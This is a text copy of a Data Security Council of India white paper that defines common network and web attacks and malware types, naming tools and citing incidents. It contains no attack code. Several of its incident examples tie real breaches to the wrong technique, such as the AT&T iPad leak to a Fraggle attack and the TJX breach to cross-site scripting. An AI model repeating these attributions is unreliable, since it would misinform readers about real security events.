type of attacks dsci white paper 1

8/3/2019 Type of Attacks DSCI White Paper 1

1/30

A NASSCOM Initiative

White Paper: Type of Attacks

Author: Mr. Mayank Lau

Consultant Security-Practices

DATA SECURITY COUNCIL OF INDIA

Niryat Bhawan, 3rd Floor, Rao Tula Ram

Marg, New Delhi 110057

P: +91-11-26155071 |W:www.dsci.in
http://www.dsci.in/http://www.dsci.in/http://www.dsci.in/http://www.dsci.in/


2/30

Type of Attacks


EXECUTIVE SUMMARYAs with the digitization of the world business and interaction going mobile , IT

security specialist and white hats are finding it difficult to guard against ever

increasing threat database .This threat database is dynamic in nature and needs

an attention toward its . We need to understand how to make our working and

social environment safe from them, in order to do that first leap we can take is to

understand the functionality and nature of these threats .Keeping this is in mind

an effort has been made in the form of a white paper that consolidates nearly allthe threats definitions on the macro level. This document serve the purpose if

one needs to understand the definitions of all attacks and symptoms associated

with them. As both end point and cyber world is germane for all organizations, so

we need to cover the type of threats which affects both disciplines.

Last decade have witnessed paradigm shift how hackers looks to exploit

vulnerabilities within the organization and nation infrastructure. In order to

counter that we all have to change our outlook towards how we foresee security

feature around the globe. This white paper with latest trends talks about latest

exploits and how we can learn from them.

With a view of shedding light on the nature and behavior of infection vectors and

to make this paper dynamic in nature it will require a collaborative effort from all

of us.


3/30

Type of Attacks


Contents

1. DoS Attacks: ................................................................................................................... 4

2. Ping Flood: ...................................................................................................................... 8

3. Ping of Death: ................................................................................................................. 9

4. Port Scanning: ............................................................................................................... 10

5. ARP Spoofing: .............................................................................................................. 10

6. ACK flood:.................................................................................................................... 13

7. FTP Bounce Attack: ..................................................................................................... 13

8. TCP Session Hijacking: ................................................................................................ 13

9. Man-In-The-Middle Attack: ......................................................................................... 13

10. Social Engineering Attacks: ........................................................................................ 14

11. OS Finger Printing: ..................................................................................................... 15

12. Stealth Scan:................................................................................................................ 15

13. Key-Loggers: .............................................................................................................. 15

14. ICMP Tunneling: ........................................................................................................ 16

15. LOKI Attack: .............................................................................................................. 16

16. TCP Sequence Attack: ................................................................................................ 17

17. CAM Table Overflow: ................................................................................................ 17

18. WEB APPLICATION ATTACKS: ............................................................................ 19

19. Virus:........................................................................................................................... 24

20. Worm: ......................................................................................................................... 24

21. Malware: ..................................................................................................................... 25

22. Adware: ....................................................................................................................... 26

23. Spyware: ..................................................................................................................... 26

24. Trojan: ......................................................................................................................... 27

25. Root kit: ...................................................................................................................... 28

REFERENCES ................................................................................................................. 29


4/30

Type of Attacks


1. DoS Attacks:In a denial-of-service (DoS) attack, an attacker attempts to prevent legitimate

users from accessing information or services.The most common and obvious type of DoS attack occurs when an attacker

"floods" a network with information. When you type a URL for a particular website

into your browser, you are sending a request to that site's computer server to

view the page. The server can only process a certain number of requests at

once, so if an attacker overloads the server with requests, it can't process your

request. This is a "denial of service" because you can't access that site.

Tools generally are Hping, Nemesis and other packet Crafting tools.

Symptoms:

unusually slow network performance (opening files or accessing websites)

unavailability of a particular website

inability to access any website

dramatic increase in the amount of spam you receive in your account

Examples: On December 8, 2010, a group calling themselves "Anonymous"

launched orchestrated DDoS attacks on organizations such as Mastercard.com,

PayPal, Visa.com and PostFinance; as part of the ongoing "Operation Payback"

campaign, which originally targeted anti-piracy organizations, in support of the

Whistle blowing site Wikileaks and its founder, Julian Assange. The attack

brought down the Mastercard, PostFinance, and Visa websites successfully by

deploying 3 versions of the Denial of Service tool.

On November 28, 2010, whistle blower site wikileaks.org experienced a DDoS

attack. This was presumably related to the pending release of many thousands of

secret diplomatic cables


5/30

Type of Attacks


Types of Dos Attack:

1. ICMP Flood Attack

2. Tear Drop Attack3. Smurf Attack

4. SYN Flood

5. Land Attack

6. Jolt Dos Attack

7. Fraggle Dos Attack

Tear Drop Attacks:

A series of data packets are sent to the target computer with overlapping

field values and large size payloads. As a result, the target computer is unable to

reassemble these packets and is forced to crash, hang or even reboot.

Example

Around September 2009, a vulnerability in Windows Vista was referred to as a

"teardrop attack", but the attack targeted SMB2 which is a higher layer than the

TCP packets that teardrop used

Land Attack:

The attacker sends a spoofed TCP SYN packet in which the IP address of

the target is filled in both the source and destination fields. On receiving the

spoofed packet, the target gets confused and goes into a frozen state.

Note: These types of attacks are detected by Anti-virus these days.

Example

This security flaw was actually first discovered in 1997 by someone using the

alias "m3lt", and has resurfaced many years later in operating systems such as

Windows Server 2003 and Windows XP SP2.


6/30

Type of Attacks


Jolt Dos Attack:

An attacker fragments the ICMP packet in such a way that the target

cannot reassemble it. Consequently the CPU usage goes high and getscrashed.

Example:

In 2009 Jolt dos attacks was utilized against twitter in a series of electronic

attacks, which have targeted large web hosts and domain registrars

The attacks knocked Twitter offline for some time, with both Net craft and

Pingdom reporting about three hours of downtime. Twitter co-founder Biz Stone

confirmed that the outage was caused by a denial of service attack(Jolt in this

case), which affected both the Twitter web site and the services that access

Twitter data via API calls, according to the Twitter

Smurf Attack:

The attacker sends a large amount of ICMP echo request to IP Broadcast

Address. These ICMP requests have a spoofed source address of the intended

victim. So if the routing device delivering traffic to those broadcast addresses

delivers the IP broadcast to all the hosts, most of the IP addresses send an

ECHO reply message. However, on a multi-access broadcast network, hundreds

of computers might reply to each packet when the target network is overwhelmed

by all the messages sent simultaneously. So the network will be unable to work

normally.

Example

In July and August 2010, the Irish government Central Applications Office

server was hit by a denial of service attack on four separate occasions, causing

difficulties for thousands of Second Level students who are required to use the

CAO to apply for University and College places.


7/30

Type of Attacks


Fraggle Dos Attack:

The attacker sends a large amount of UDP echo requests traffic to IP

broadcast address. These UDP packets have a spoofed source address of theintended victim. So if the routing device delivering traffic to those broadcast

addresses delivers the IP broadcast to all the hosts, most of the IP addresses

send an ECHO reply message. However, on a multi-access broadcast network,

hundreds of computers might reply to each packet when the target network is

overwhelmed by all the messages sent simultaneously. So the network will be

unable to work normally.

Example

Using Fraggle UDP request hackers were able to do exposed over 100,000

AT&T Customers iPad Records In June, a cybercriminal organization named

Goatse was able to exploit a security flaw through an AT&T Web application.

The breach exposed email addresses of iPad 3G users. Many high-ranking

media, as well as government and military members of Apples early adopter

program, were on the list. Numerous members of the U.S. Department of

Defenses advanced research team had their information exposed websense

believes that Apple will continue to be a choice attack target, as the

consumerization of their products quickly flourish in many work environments.


8/30

Type of Attacks


SYN Flood:

SYN flood sends a flood of TCP/SYN packets, often with a forged sender

address. Each of these packets is handled like a connection request, causing theserver to spawn a half-open connection, by sending back a TCP/SYN-ACK

packet, and waiting for a packet in response from the sender address. However,

because the sender address is forged, the response never comes. These half-

open connections saturate the number of available connections the server is able

to make, keeping it from responding to legitimate requests until after the attack

ends.

2. Ping Flood:Ping flood is based on sending the victim an overwhelming number of ping

packets, usually using the "ping" command from UNIX like hosts (the -t flag on

Windows systems has a far less malignant function). It is very simple to launch,

the primary requirement being access to greater bandwidth than the victim.

Example

On August 6, 2009 several social networking sites, including Twitter, Facebook,

Live journal, and Google blogging pages were hit by Ping flood attacks,

apparently aimed at Georgian blogger "Cyxymu.This brought a down time for

some of these social networking sites.
http://en.wikipedia.org/wiki/Twitterhttp://en.wikipedia.org/wiki/Facebookhttp://en.wikipedia.org/wiki/Livejournalhttp://en.wikipedia.org/wiki/Googlehttp://en.wikipedia.org/wiki/Cyxymuhttp://en.wikipedia.org/wiki/Cyxymuhttp://en.wikipedia.org/wiki/Cyxymuhttp://en.wikipedia.org/wiki/Googlehttp://en.wikipedia.org/wiki/Livejournalhttp://en.wikipedia.org/wiki/Facebookhttp://en.wikipedia.org/wiki/Twitter


9/30

Type of Attacks


3. Ping of Death:The attacker sends an ICMP Packet larger than 65.536 bytes. Since the OS does

not know how to handle such a large packet, it either freezes or crashes at thetime of reassembling it.

Nowadays the OS discard such packets by itself.

Example

This was affecting every one of us on daily basis as recently Microsoft plugs

1990s-era 'Ping of Death', patches IE9, Windows DNS service. Microsoft has

issued 13 security updates that patched 22 vulnerabilities in Internet Explorer,

Windows, Office and other software, including one that harked back two decades

to something dubbed "Ping of Death."

Distributed Denial of Service (DDos):

In a distributed denial-of-service (DDoS) attack, an attacker may use your

computer to attack another computer. By taking advantage of security

vulnerabilities or weaknesses, an attacker could take control of your computer.

He or she could then force your computer to send huge amounts of data to a

website or send spam to particular email addresses. The attack is "distributed"

because the attacker is using multiple computers, including yours, to launch the

denial-of-service attack. Tools used are TFN (Tribe Flood Network), TFN2K,

Trin00, Trinity, Stacheldraht, Shaft, MStream

Example

In July and August 2010, the Irish Central Applications Office server was hit by

a denial of service attack on four separate occasions, causing difficulties for

thousands of Second Level students who are required to use the CAO to apply

for University and College places. The attack is currently subject to a Garda

investigation


10/30

Type of Attacks


Prevention:

1. Applying Router Filtering

2. Blocking undesired IP Addresses3. Permitting network access only to desired traffic

4. Disabling un-needed network services

5. Updating Antivirus regularly

6. Having a very good password policy.

7. Limiting the amount of Network Bandwidth

8. Using the network-ingress filtering

4. Port Scanning:Port Scanning is one of the most popular reconnaissance techniques

attackers use to discover services they can break into. All machines connected to

a Local Area Network (LAN) or Internet run many services that listen at well-

known and not so well known ports. A port scan helps the attacker find which

ports are available (i.e., what service might be listing to a port).

Essentially, a port scan consists of sending a message to each port, one at a

time. The kind of response received indicates whether the port is used and can

therefore be probed further for weakness.

Well Known Ports (0 - 1023)

Registered Ports (1024 - 49151)

Dynamic and/or Private Ports (49152 - 65535)

5. ARP Spoofing:

ARP Poison Routing (APR), is a technique used to attack an Ethernet wired or

wireless network. ARP Spoofing may allow an attacker to sniff data frames on a

local area network (LAN), modify the traffic, or stop the traffic altogether. The

attack can only be used on networks that actually make use of ARP and not

another method of address resolution.


11/30

Type of Attacks


Detection: Reverse ARP (RARP) is a protocol used to query the IP address

associated with a given MAC address. If more than one IP address is returned,MAC cloning is present.

Tools: Arpoison, Cain and Abel, and Ettercap

Example

One ARP Spoofing packet sniffer obtained data for about 5,000 Dave & Buster's

customers in Islandia, New York, causing losses of at least $600,000 to the card

issuing banks. While the defendants successfully penetrated a terminal at an

Arundel, Maryland, location in April 2007, their packet sniffer did not work, so

they were unable to gain access to any credit card data. Improved versions of

their program successfully logged the information, but a bug caused the software

to be deactivated each time the point-of-sale servers were rebooted.

MAC Flood Attack: In a typical MAC flooding attack, a switch is flooded with

packets, each containing different source MAC addresses. The intention is to

consume the limited memory set aside in the switch to store the MAC address-to-

physical port translation table. Tools: XArp

The result of this attack causes the switch to enter a state called fail open mode,

in which all incoming packets are broadcast out on all ports (as with a hub),

instead of just down the correct port as per normal operation. A malicious user

could then use a packet sniffer (such as Wireshark) running in promiscuous

mode to capture sensitive data from other computers (such as unencryptedpasswords, e-mail and instant messaging conversations), which would not be

accessible were the switch operating normally


12/30

Type of Attacks


Example

Anti- Spyware 2011 a MAC flood which attacks Windows 9x, 2000, XP,Vista,

and Windows 7, posing as an anti-spyware program. It actually disables security-

related process of anti-virus programs, while also blocking access to the Internet

which prevents updates

DNS cache poisoning:

This is a maliciously created or unintended situation that provides data to a

caching name server that did not originate from authoritative Domain Name

System (DNS) sources. This can happen through improper software design,

misconfiguration of name servers, and maliciously designed scenarios exploiting

the traditionally open architecture of the DNS system. Once a DNS server has

received such non-authentic data and caches it for future performance increase,

it is considered poisoned, supplying the non-authentic data to the clients of the

server.

Example

In July 2009 Using DNS cache poisoning Symantec discovered Dap rosy Worm

said Trojan worm is intended to steal online-game passwords in internet cafes. It

could, in fact, intercept all keystrokes and send them to its author which makes it

particularly a very dangerous worm to infect B2B (business-to-business)

systems.

IP Spoofing:

IP spoofing refers to the creation of Internet Protocol (IP) packets with a forged

source IP address, called spoofing, with the purpose of concealing the identity of

the sender or impersonating another computing system.


13/30

Type of Attacks


6. ACK flood:This is a technique to send a TCP/ACK packet to the target often with a forged IP

address. It is very similar to TCP/SYN flood attacks.

7. FTP Bounce Attack:The Attacker can connect to the FTP servers and intend to send files to other

machines using the PORTcommand. So that the FTP server will try to send the

file to other machines on a specified port and check the port is open. It is obvious

that the FTP transfer would be allowed on the firewalls. These days almost all

the FTP servers are deployed with disabled PORT command.

8. TCP Session Hijacking:It is the case when the Hacker takes over the existing TCP session which is

already established between 2 parties. Since most of the TCP session

authentication occurs at the beginning of the session, hackers make this attack

possible.

9. Man-In-The-Middle Attack:It is also called as Janus attack and abbreviated as MITM. This occurs when the

hacker sits between 2 legitimate parties and sniffs the communication to get

valuable data like passwords, usernames or even certificates/keys etc to use it

later. MITM is active Eaves-Dropping


14/30

Type of Attacks


Example

Using Janus attack techniques

Oklahoma Tax Commission Site CompromisedAttack Date: 01/29/2010

Attack Details: Websense Security Labs and the Websense Threat Seeker

Network discovered that the home page of the Oklahoma Tax Commission

website had been compromised with malicious script code. After the page was

loaded, the browser executed the injected script in the background. The injected

script code would go through a series of de obfuscation techniques that

ultimately took the victim computer to an attack website without the victims

consent or knowledge.

10. Social Engineering Attacks:A social engineering attack is one in which the intended victim is somehow

tricked into doing the attacker's bidding. Examples like replying to an Email sent

by the attacker or a phone call by an attacker impersonating as a legitimate

user/colleague revealing confidential data.

Example

World Cup Targeted by Malicious Spam Campaign using social engineering

techniques in June 2010

Attack Details: Websense Security Labs and the Websense Threat Seeker

Network detected a new wave of interesting malicious emails. At the dawn of the

eagerly anticipated World Cup tournament we expected to be inundated with

suitably themed spam. The sample we encountered was a little different from the

usual sample, because the technique used may not raise suspicion. We saw

over 80,000 email messages in this new campaign, which used an HTML

attachment with an embedded JavaScript. Upon execution, this script led to a

malicious website.


15/30

Type of Attacks


11. OS Finger Printing:Each Operating System has a unique subset of TCP/IP Stack. While a Port scan

is done usually the scanners analyze this unique stack and try to match thefingerprints within its database.

Inverse Mapping:

Inverse mapping is a stealth-approach network scanning method that gathers

information about inactiveIP addresses on a network to try to determine which IP

addresses are associated with activehosts.

12. Stealth ScanThe Port scans which are carried out in a way it could Evade the Filtering or

blocking Devices (IPS, IDS, Firewall) with its own unique techniques (SYN Scan,

ACK Scan, FIN Scan, Null Scan) . The delay of each packet send to the target

and Packet fragmentation also matters when it comes to Stealth Scan.

13. Key-Loggers:2 types of key loggers are available software and hardware key loggers.

Software Key loggers:

These are installed in the computer and programmed to run in the background,

so that the user wont be able to find and sense that this is running. The

perspective of using this is to Log all the Keystrokes, snapshot of OS, even the

Mouse click can be recorded and could be configured to send these information

to a pre-defined E-mail address. These are called Spywares.

Example

In 2011 Pentagon reveals 24,000 files stolen in cyber-attack

Penetrations of defense industry computer networks have targeted a wide swathof military hardware, including missile tracking systems and drone aircraft.


16/30

Type of Attacks


Hardware Key loggers:

This can be plugged on a computer (PS/2 connector). So when the user types

something the keystrokes gets interpreted by the key logger first and store themon their internal memory. Then the IRQ goes to the CPU for processing.

Otherwise it is very similar to the Software Key logger.

Ping Sweep:

Ping Sweep is a technique used to determine which of a range of IP addresses

map to live hosts. It consists of ICMP ECHO requests sent to multiple hosts. If a

given address is live, it will return an ICMP ECHO reply.

14. ICMP Tunneling:Tunneling is often used to bypass firewalls which do not block ICMP packets, or

to establish hard to trace, encrypted communication channel between two

computers without direct network interaction. An ICMP tunnel establishes a

covert connection between two remote computers (a client and proxy), using

ICMP echo requests and reply packets. An example of this technique is tunneling

complete TCP traffic over ping requests and replies.

15. LOKI Attack:LOKI is a client/server program published in the online publication Phrack. This

program is a working proof-of-concept to demonstrate that data can be

transmitted somewhat secretly across a network by hiding it in traffic that

normally does not contain payloads. For example, the code can tunnel the

equivalent of a Unix RCMD/RSH session in either ICMP echo request (ping)

packets or UDP traffic to the DNS port. This is used as a back door into a Unixsystem after root access has been compromised. Presence of LOKI on a system

is evidence that the system has been compromised in the past.


17/30

Type of Attacks


Example

Using LOKI attack techniques a virus was introduced Office.Microsoft.Com

Search Results Can Lead to Rogue Antivirus Web sense Security Labs and theweb sense Threat Seeker Network detected that search results onoffice.microsoft.com can lead users to a Rogue AV page. Users looking forinformation related to help with Office products on Microsofts own site are beingtargeted. Users may be unaware that when they type in search queries on thesite, Microsoft scours its own website for results but also pulls in results from thebroader Web. Since the URL for the search results begins withhttp://office.microsoft.com, this is particularly troubling for users who trust sitessimply because of their reputation. The malicious URL served as a redirect to avery real-looking virus scan and warning page presented by a Rogue AV. At thetime of discovery, the executable used in the exploit was only recognized by one

of the 41 AV engines on Virus Total.

16. TCP Sequence Attack:A TCP sequence prediction attack is an attempt to predict the sequence number

used to identify the packets in a TCP connection, which can be used to duplicate

packets leading to session hijacking.

17. CAM Table Overflow:A switch's CAM table contains network information such as MAC addresses

available on physical switch ports and associated VLAN parameters. CAM Table

Overflows occur when an entry of MAC addresses is flooded into the table and

the CAM table threshold is reached. This causes the switch to act like a hub,

flooding the network with traffic out all ports. The flooding caused by a CAM

Table Overflow is limited to the source VLAN, thus does not affect other VLANs

on the network


18/30

Type of Attacks


ICMP Redirect Attacks:

ICMP redirect messages are used to redirect a source host to use a different

gateway that may be closer to the destination. These redirect messages are sentby the receiving gateway and the source host should adapt its forwarding

accordingly when receiving this message. ICMP Redirects are most often used in

source routing environments where the source host calculates routing paths to all

destinations itself. ICMP redirects may also be used to amplify SMURF or

FRAGGLE attacks or to set up Man-in-the-Middle attacks.

Example

June 2009 the P2P site The Pirate Bay was rendered inaccessible due to a

ICMP Redirect attack. This was most likely provoked by the recent sellout to

Global Gaming Factory X AB, which was seen as a "take the money and run"

solution to the website's legal issues. In the end, due to the buyers' financial

troubles, the site was not sold

DNS Zone Transfer Attack:

A Zone Transfer request to a DNS server returns a complete list of hostnames

and IP addresses in the domain. Ordinarily, zone transfers should only occur

between authoritative DNS servers for a domain. Attackers may query DNS

servers to compile a list of possible hosts to attack. This signature detects

attempted zone transfers from sources other than DNS servers.


19/30

Type of Attacks


18. WEB APPLICATION ATTACKS:

SQL Injection:It is also called as SQL Insertion Attack which helps the hacker to execute a code

due to a presence of vulnerability at the database layer of the Application.

Consequently, the code will get confidential data or even compromise the

application itself.

Example

In June, 2011, Group Anonymous claims to have hacked the NATO, using a"simple SQL injection."

On 8 November 2010 the British Royal Navy website was compromised by Tin

Kode using SQL injection

Cross-Site Scripting:

Cross-site scripting holes are web application vulnerabilities that allow attackers

to bypass client-side security mechanisms normally imposed on web content by

modern browsers. By finding ways of injecting malicious scripts into web pages,

an attacker can gain elevated access privileges to sensitive page content,

session cookies, and a variety of other information maintained by the browser on

behalf of the user. Cross-site scripting attacks are therefore a special case of

code injection.


20/30

Type of Attacks


Example

TJX Companies, owners of T.J. Maxx, Marshalls, Winners, Home Goods, A.J.

Wright, and Bobs stores fell prey to one of the worst web hacking incidents to-

date. On the 17th January 2008, the company disclosed that 40 million of their

customers credit and debit card details were stolen. In parallel, federal credit

union SEFCU published a similar warning that the personal details of 10,000 of

its customers were compromised in the web hacking attack

Cross-Site Request Forgery:

Cross-site request forgery, also known as a one-click attack or session riding and

abbreviated as CSRF ("sea-surf") or XSRF, is a type of malicious exploit of a

website whereby unauthorized commands are transmitted from a user that the

website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user

has for a particular site, CSRF exploits the trust that a site has in a user's

browser.

Example

In June 2011 Google discovered that a number of its Gmail account user names

and passwords of personal accounts belonging to senior government officials,

activists, and journalists, had been compromised. The hack appears to have

originated from Jinan, China, although Google did not accuse any individuals or

governments of orchestrating the attack. Chinese Foreign Affairs Minister Hong

Le denied being the source. Similar spear phishing attempts were also

discovered in Hotmail and Yahoo Mail
http://www.pcmag.com/article2/0,2817,2386287,00.asphttp://www.pcmag.com/article2/0,2817,2386302,00.asphttp://www.pcmag.com/article2/0,2817,2386370,00.asphttp://www.pcmag.com/article2/0,2817,2386370,00.asphttp://www.pcmag.com/article2/0,2817,2386302,00.asphttp://www.pcmag.com/article2/0,2817,2386287,00.asp


21/30

Type of Attacks


Cookie Poisoning Attack:

Cookie Poisoning attacks involve the modification of the contents of a cookie

(personal information stored in a Web user's computer) in order to bypasssecurity mechanisms. Using cookie poisoning attacks, attackers can gain

unauthorized information about another user and steal their identity.

Cookie Stealing:

These types of attacks are done by Client-Side Scripts like JavaScript. When the

user clicks on a link the script will look for the cookie stored on the computers

memory for all the active cookies and sends (apparently emails) it to the attacker.

Phishing Attacks:

Phishing is the criminally fraudulent process of attempting to acquire sensitive

information such as usernames, passwords and credit card details by

masquerading as a trustworthy entity in an electronic communication.

Web Defacement Attack:

Website defacement is an attack on a website that changes the visual

appearance of the site. These are typically the work of system crackers, who

break into a web server and replace the hosted website with one of their own.

Most probably, these kinds of attacks are done intentionally to spoil the

reputation of the company that has hosted this website.

Buffer Overflow:

Buffer overflow, or buffer overrun, is an anomaly where a process stores data in

a buffer outside the memory the programmer set aside for it. The extra data

overwrites adjacent memory, which may contain other data, including program

variables and program flow control data. This may result in memory access

errors, incorrect results, program termination, or a breach of system security.

This vulnerability is completely a Programmers mistake.


22/30

Type of Attacks


Forced Browsing:

Forced browsing is an attack where the aim is to enumerate and access

resources that are not referenced by the application, but are still accessible. For

Example, directories like config, backup, logs which can be accessed can reveal

a lot of information about the application itself, password, activities etc.

Example

Over a period of 4 hours on Wednesday April 27, 2011 an automated SQL

injection attack occurred on Broadband Reports website that was able to extract

8% of the username/password pairs: 8,000 random accounts of the 9,000 active

and 90,000 old or inactive accounts

HTTP Response Splitting:

An attacker passes malicious data to a vulnerable application, and the

application includes the data in an HTTP response header. This attack itself

does not cause any harm but it would lead to other sensitive attacks like XSS.

Example

A hacker infiltrated a massive database from the University of California, Los

Angeles, containing personal information (including social security numbers,

dates of birth, home addresses and contact information) on 800,000 people in

one of the worst computer breaches ever at a US university.


23/30

Type of Attacks


Injection Flaws:

Injection flaws allow attackers to relay malicious code through a web application

to another system. These attacks include calls to the operating system via

system calls, the use of external programs via shell commands, as well as calls

to backend databases via SQL (i.e., SQL injection). Whole scripts written in perl,

python, and other languages can be injected into poorly designed web

applications and executed. Any time a web application uses an interpreter of any

type there is a danger of an injection attack. Any time a web application uses an

interpreter of any type there is a danger of an injection attack.

Example

On December 4 2010, a group calling itself the Pakistan Cyber Army hacked the

website of India's top investigating agency, the Central Bureau of Investigation

(CBI).

In 2010 A click jacking worm that forced hundreds of thousands of unsuspecting

Facebook users to unknowingly post spam messages on their profiles, rapidly

spread through the social networking website over the weekend. The worm used

catchy news headlines to lure its victims.


24/30

Type of Attacks


19. Virus:A computer virus is a computer program that can copy itself and infect a

computer. The term "virus" is also commonly but erroneously used to refer toother types of malware, including but not limited to adware and spyware

programs that do not have the reproductive ability. A true virus can spread from

one computer to another (in some form of executable code) when its host is

taken to the target computer; for instance because a user sent it over a network

or the Internet, or carried it on a removable medium such as a floppy disk, CD,

DVD, or USB drive.

Examples

Intramar, the French Navy computer network, was infected with Conficker on 15

January 2009. The network was subsequently quarantined, forcing aircraft at

several airbases to be grounded because their flight plans could not be

downloaded

In January 2010, the Greater Manchester Police computer network was infected,

leading to its disconnection for three days from the Police National Computer as

a precautionary measure; during that time, officers had to ask other forces to runroutine checks on vehicles and people.

20. Worm:A computer worm is a self-replicating malware computer program. It uses a

computer network to send copies of itself to other nodes (computers on the

network) and it may do so without any user intervention. This is due to security

shortcomings on the target computer. Unlike a virus, it does not need to attach

itself to an existing program. Worms almost always cause at least some harm to

the network, by consuming bandwidth or so, whereas viruses almost always

corrupt or modify files on a targeted computer.
http://en.wikipedia.org/wiki/Greater_Manchester_Policehttp://en.wikipedia.org/wiki/Police_National_Computerhttp://en.wikipedia.org/wiki/Police_National_Computerhttp://en.wikipedia.org/wiki/Greater_Manchester_Police


25/30

Type of Attacks


Example:

Stuxnet is a computer worm which affected Iran's Bushehr nuclear power plant in

September 2010. Designed to target weaknesses in Siemens electronic

industrial systems, it is thought to be capable of seizing control of industrial

plants and to be the first 'worm' created for this purpose. The complexity of its

design and targeted purpose left Western computer experts suggesting it could

only have been the product of a "nation state". Mahmoud Liayi, from Iran's

Ministry of Industries, is quoted as saying, "an electronic war has been launched

against Iran". As well as targeting nuclear power stations, it is also capable ofattacking systems which manage water supplies, oil rigs and other utilities

21. Malware:Malware it is a short form of malicious software. Malware is not the same as

defective software, that is, software that has a legitimate purpose but contains

harmful bugs. Malware includes computer viruses, worms, trojan horses,

spyware, dishonest adware, crime ware, most root kits, and other malicious and

unwanted software.Example

On January 13, 2010, Google Inc. announced that operators, from within China,

had hacked into their Google China operation, stealing intellectual property and,

in particular, accessing the email accounts of human rights activists. The attack

was thought to have been part of a more widespread cyber attack on companies

within China which has become known as Operation Aurora. Intruders were

thought to have launched a zero-day attack, exploiting a weakness in the

Microsoft Internet Explorer browser, the malware used being a modification of the

Trojan Hydraq Concerned about the possibility of hackers taking advantage of

this previously unknown weakness in Internet Explorer, the Government of

Germany, then France, issued warnings not to use the browser


26/30

Type of Attacks


22. Adware:Adware, or advertising-supported software, is any software package which

automatically plays, displays, or downloads advertisements to a computer afterthe software is installed on it or while the application is being used. Advertising

functions are integrated into or bundled with the software, which is often

designed to note what Internet sites the user visits and to present advertising

pertinent to the types of goods or services featured there.

23. Spyware:Spyware is a type of malware that is installed on computers and collects little bits

of information at a time about users without their knowledge. The presence of

spyware is typically hidden from the user, and can be difficult to detect. Typically,

spyware is secretly installed on the user's personal computer. Sometimes,

however, spywares such as key loggers are installed by the owner of a shared,

corporate, or public computer on purpose in order to secretly monitor other users.

Example

Word Press Attacks

Blog platforms have always been vulnerable to attacks due to newly developed

spywares. Research shows that 56 percent of all Compromised blogs are

attacked more than once. Word Press (used by more than 13.9 million blogs), the

worlds most commonly used blogging software platform, was hacked numerous

times throughout 2010.

Numerous vulnerabilities were known to exist during the height of the attacks. Go

Daddy (Hosts 43 million domains and other hosting sites) saw persistent attacks

in 2010. Something else worth noting is that when celebrity blogs are hacked,

many people assume this means public defacement or an attempt to defame

celebrity status. Although this happens on occasion, most attacks target financial

gain.


27/30

Type of Attacks


24. Trojan:A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating

malware that appears to perform a desirable function for the user but insteadfacilitates unauthorized access to the user's computer system.

Example

According to a survey conducted by BitDefender from January to June 2009,"Trojan-type malware is on the rise, accounting for 83-percent of the global

malware detected in the world". This virus has a relationship with worms as it

spreads with the help given by worms and travel across the internet with them.

February 18 2010 Microsoft announced that a BSoD problem on some windows

machines which was triggered by a batch of Patch Tuesday updates was caused

by the Alureon Trojan
http://en.wikipedia.org/wiki/Microsofthttp://en.wikipedia.org/wiki/BSoDhttp://en.wikipedia.org/wiki/Patch_Tuesdayhttp://en.wikipedia.org/wiki/Alureonhttp://en.wikipedia.org/wiki/Alureonhttp://en.wikipedia.org/wiki/Patch_Tuesdayhttp://en.wikipedia.org/wiki/BSoDhttp://en.wikipedia.org/wiki/Microsoft


28/30

Type of Attacks


25. Root kit:A root kit is a type of software that is designed to gain administrator-level control

over a computer system without being detected. In virtually all cases, thepurpose and motive is to perform malicious operations on a target host

computing system at a later date without the knowledge of the administrators or

users of that system. Root kits can be installed in hardware or software targeting

the BIOS, hypervisor, boot loader, kernel or less commonly, libraries or

applications.

Example

According to the Associated Press in 2010, Spanish police arrested three

ringleaders behind a Mariposa root kit that infected 12.7 million PCs, stealing

credit teased and banking information. Infected computers were at more than half

the Fortune 1,000 companies and 40 major banks. The Mariposa root kit was

one of the worlds largest and appears to be more sophisticated than the root kit

that was used to hack Google Inc.


29/30

Type of Attacks


REFERENCES

Symantec Glossaryhttp://www.symantec.com/business/security_response/glossary/index.jsp

NSIT handbook

http://alcor.concordia.ca/~helpline/security/threats.html ZB Shareware

http://www.zbshareware.com/threats/types_threats.html Data center knowledge

http://www.datacenterknowledge.com/archives/2009/08/06/twitter-is-latest-victim-in-series-of-attacks/

Wikipedia

http://en.wikipedia.org/wiki/

Cyber thugs

http://www.cyberthugs.org/protect-yourself-from-cyberwarfare-rootkit-threats/

Net security

http://www.net-security.org/secworld.php?id=7204

Symantec Threat report 2010

https://www4.symantec.com/mktginfo/downloads/21182883_GA_REPORT_IST

R_Main-Report_04-11_HI-RES.pdf

Web sense threat report 2010http://www.websense.com/assets/reports/report-websense-2010-threat-report-en.pdf
http://www.symantec.com/business/security_response/glossary/index.jsphttp://www.symantec.com/business/security_response/glossary/index.jsphttp://alcor.concordia.ca/~helpline/security/threats.htmlhttp://alcor.concordia.ca/~helpline/security/threats.htmlhttp://www.zbshareware.com/threats/types_threats.htmlhttp://www.zbshareware.com/threats/types_threats.htmlhttp://www.datacenterknowledge.com/archives/2009/08/06/twitter-is-latest-%20%20%20%20%20%20%20%20%20%20%20%20%20victim-in-series-of-attacks/http://www.datacenterknowledge.com/archives/2009/08/06/twitter-is-latest-%20%20%20%20%20%20%20%20%20%20%20%20%20victim-in-series-of-attacks/http://en.wikipedia.org/wiki/http://en.wikipedia.org/wiki/http://www.cyberthugs.org/protect-yourself-from-cyberwarfare-rootkit-threats/http://www.cyberthugs.org/protect-yourself-from-cyberwarfare-rootkit-threats/http://www.net-security.org/secworld.php?id=7204http://www.net-security.org/secworld.php?id=7204https://www4.symantec.com/mktginfo/downloads/21182883_GA_REPORT_ISTR_Main-Report_04-11_HI-RES.pdfhttps://www4.symantec.com/mktginfo/downloads/21182883_GA_REPORT_ISTR_Main-Report_04-11_HI-RES.pdfhttps://www4.symantec.com/mktginfo/downloads/21182883_GA_REPORT_ISTR_Main-Report_04-11_HI-RES.pdfhttp://www.websense.com/assets/reports/report-websense-2010-threat-report-en.pdfhttp://www.websense.com/assets/reports/report-websense-2010-threat-report-en.pdfhttps://www4.symantec.com/mktginfo/downloads/21182883_GA_REPORT_ISTR_Main-Report_04-11_HI-RES.pdfhttps://www4.symantec.com/mktginfo/downloads/21182883_GA_REPORT_ISTR_Main-Report_04-11_HI-RES.pdfhttp://www.net-security.org/secworld.php?id=7204http://www.cyberthugs.org/protect-yourself-from-cyberwarfare-rootkit-threats/http://en.wikipedia.org/wiki/http://www.datacenterknowledge.com/archives/2009/08/06/twitter-is-latest-%20%20%20%20%20%20%20%20%20%20%20%20%20victim-in-series-of-attacks/http://ww